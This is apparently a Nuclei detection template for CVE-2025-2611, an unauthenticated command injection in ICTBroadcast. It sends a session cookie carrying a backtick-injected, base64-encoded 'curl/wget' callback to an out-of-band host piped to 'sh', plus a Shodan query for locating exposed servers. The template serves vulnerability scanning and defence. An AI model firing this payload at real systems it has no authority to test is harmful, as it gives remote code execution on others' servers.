id: CVE-2025-2611

info:
  name: ICTBroadcast - Command Injection
  author: Chocapikk
  severity: critical
  description: |
    The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full server compromise.
  remediation: |
    Update to a version later than 7.4 or the latest available version.
  reference:
    - https://www.vulncheck.com/blog/ictbroadcast-kev
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2611
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2611
    epss-score: 0.77727
    epss-percentile: 0.99021
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"ICTBroadcast"
  tags: cve,cve2025,rce,ictbroadcast,oast,oob,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: header
        words:
          - "Set-Cookie:"
        internal: true

    extractors:
      - type: regex
        name: cookie_name
        part: header
        group: 1
        regex:
          - '(?mi)^Set-Cookie:\s*([A-Za-z0-9_-]+)='
        internal: true

  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{cookie_name}}={{cookie_payload}}

    disable-cookie: true
    payloads:
      cookie_payload:
        - "`echo${IFS}{{base64('curl -s {{interactsh-url}} || wget -qO- {{interactsh-url}}')}}|base64${IFS}-d|sh`"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "ICTBroadcast")'
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4a0a004730450220384029c7ca79a3579da561ccc5cb3f8f3c0c47b17aa94e86213a648dd76ea40d022100b020fe13e67461034020fc9b2d9a2836516216d7d8ff1692fc41c7526217e0b1:922c64590222798bb761d5b6d8e72950